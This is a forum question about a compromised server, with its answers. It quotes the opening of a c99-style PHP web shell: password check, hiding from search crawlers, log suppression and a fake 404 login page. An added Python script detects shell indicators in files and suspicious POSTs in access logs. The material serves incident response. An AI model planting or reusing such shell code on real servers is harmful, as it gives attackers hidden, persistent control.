Someone has gained complete access to my server by uploading a php file and running a shell from the file. I searched and found out it could be a c99madshell script.

The code snippets of the file look like:

// MD5 of the password the attacker uses to log in to the shell.
$auth_pass = "f727df897cbcceea7022d3c8ec66ae29";
$color = "#df5";
$default_action = 'FilesMan';   // default panel: the file manager
@define('SELF_PATH', __FILE__);
// Cloaking: search-engine crawlers get a real 404 so the shell is never indexed.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
// Suppress every error, disable error logging, remove the execution time limit;
// the '@' hides any warning these calls would themselves produce.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);   // legacy PHP 5 call (removed in later versions)
@define('VERSION', 'Ver 2.0');
// Undo magic_quotes so POSTed commands arrive unescaped (legacy PHP 5 behaviour).
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
// Login page disguised as an Apache 404 error; the password field is styled
// to be invisible, so a casual visitor sees only "Not Found".
function printLogin() {
    echo '<title>404 Not Found</title>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
          <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
          <form method=post><input type=password name=pass></form>';
    exit;
}
// Session flag keyed on the host name; set it after a correct POSTed password
// (loose == comparison of the MD5 hashes), or unconditionally if no password is set.
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

// Detect the host OS so later commands use the right syntax.
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';

Below is the link of the complete file. https://1fichier.com/?usbv9z1ss3

Can anyone please help me to figure out what type of attack it is, what threats it poses and its remedies? I think this is a particular type of attack already faced by many. I would much appreciate it if anyone could point me in the direction to fix this particular case. Thanks

  • Your server has been hacked. The list of possible vulnerabilities is way too big to write. – ThoriumBR Dec 06 '16 at 11:31
  • @Matthew that deals with a more general concept – user3929745 Dec 06 '16 at 11:44
  • 2
    @user3929745 The advice is the same for all types of attack - once they've got software onto your box, you need to consider it all compromised. You have no way to be sure that they've not left other payloads in place which will allow them to regain access later. The answer I linked is the canonical answer to all compromised server questions for a reason. – Matthew Dec 06 '16 at 11:45

1 Answer

2

Looks like this file was uploaded to your server, presumably through a website the server is hosting. You can check your web server's access logs if you want to be sure.

The script itself is used for executing commands remotely, and also for retrieving general information about your system. ALL the information: installed software, users, groups, current uid, disk space, you name it. It looks like once you are authenticated, you also have access to some sort of control panel.

As for remedies; once they have access to your system it would be wise to just wipe it and restore a backup.

– Zwans
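The answer points at two things to check: the file itself and the web server's access log. The script below is an added example (not from the question, the answer, or the shell's authors) that does both. The indicators are taken from the snippet quoted in the question (the 32-hex-digit `$auth_pass`, the `FilesMan` action, the error-suppression calls, the Google user-agent cloaking and the fake 404 page), and the log parser assumes the Apache/nginx "combined" format. The shell source and the log lines it runs on are constructed samples; the path `/uploads/avatar.php` and the IP addresses are made up for illustration.

```python
"""Triage helpers for a suspected PHP web shell (example code, not from the original post)."""
import re
from collections import Counter

# Indicators taken from the shell source quoted in the question: (name, regex).
# A PHP file matching several of these deserves a close look.
WEBSHELL_INDICATORS = [
    ("md5_auth_pass", re.compile(r"\$auth_pass\s*=\s*['\"][0-9a-f]{32}['\"]")),
    ("filesman_action", re.compile(r"FilesMan")),
    ("silence_errors", re.compile(r"@error_reporting\s*\(\s*0\s*\)")),
    ("disable_logging", re.compile(r"@ini_set\s*\(\s*'log_errors'\s*,\s*0\s*\)")),
    ("no_time_limit", re.compile(r"@set_time_limit\s*\(\s*0\s*\)")),
    ("ua_cloaking", re.compile(r"HTTP_USER_AGENT'\]\s*,\s*'Google'")),
    ("fake_404", re.compile(r"404 Not Found")),
]


def score_php_source(source):
    """Return the names of all indicators that match the given PHP source text."""
    return [name for name, rx in WEBSHELL_INDICATORS if rx.search(source)]


# Apache/nginx "combined" log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_log_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_post_requests(lines, known_php_paths):
    """Count POST requests to .php paths the site is not known to serve.

    The quoted shell takes its password, and every later command, via POST, so
    repeated POSTs to an unfamiliar .php file from one IP is a strong lead.
    Returns a Counter keyed by (ip, path); the query string is ignored.
    """
    hits = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if path.endswith(".php") and path not in known_php_paths:
            hits[(rec["ip"], path)] += 1
    return hits


# Constructed sample: the first lines of the shell as quoted in the question.
SAMPLE_SHELL = '''<?php
$auth_pass = "f727df897cbcceea7022d3c8ec66ae29";
$default_action = 'FilesMan';
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@error_reporting(0);
@ini_set('log_errors',0);
@set_time_limit(0);
'''

# Constructed sample log lines (hypothetical IPs and paths, not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Dec/2016:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Dec/2016:10:02:40 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 833 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Dec/2016:10:02:58 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 12044 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Dec/2016:10:03:01 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Dec/2016:10:03:15 +0000] "POST /uploads/avatar.php?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]
KNOWN_PHP = {"/index.php", "/login.php"}  # the PHP entry points the site legitimately serves

if __name__ == "__main__":
    print("indicators:", score_php_source(SAMPLE_SHELL))
    for (ip, path), n in suspicious_post_requests(SAMPLE_LOG, KNOWN_PHP).most_common():
        print(f"{n:3d} POST {path} from {ip}")
```

On a real box, feed `score_php_source` every `.php` file under the web root (including upload directories that should never contain PHP) and `suspicious_post_requests` the full access log with the list of PHP files the application actually ships. The first POST to the unfamiliar file dates the compromise; the requests just before it, often a file upload to the same directory, usually show how it got there. This only scopes the incident; as the answer and comments say, the fix is still to rebuild from a clean backup rather than delete the shell and carry on.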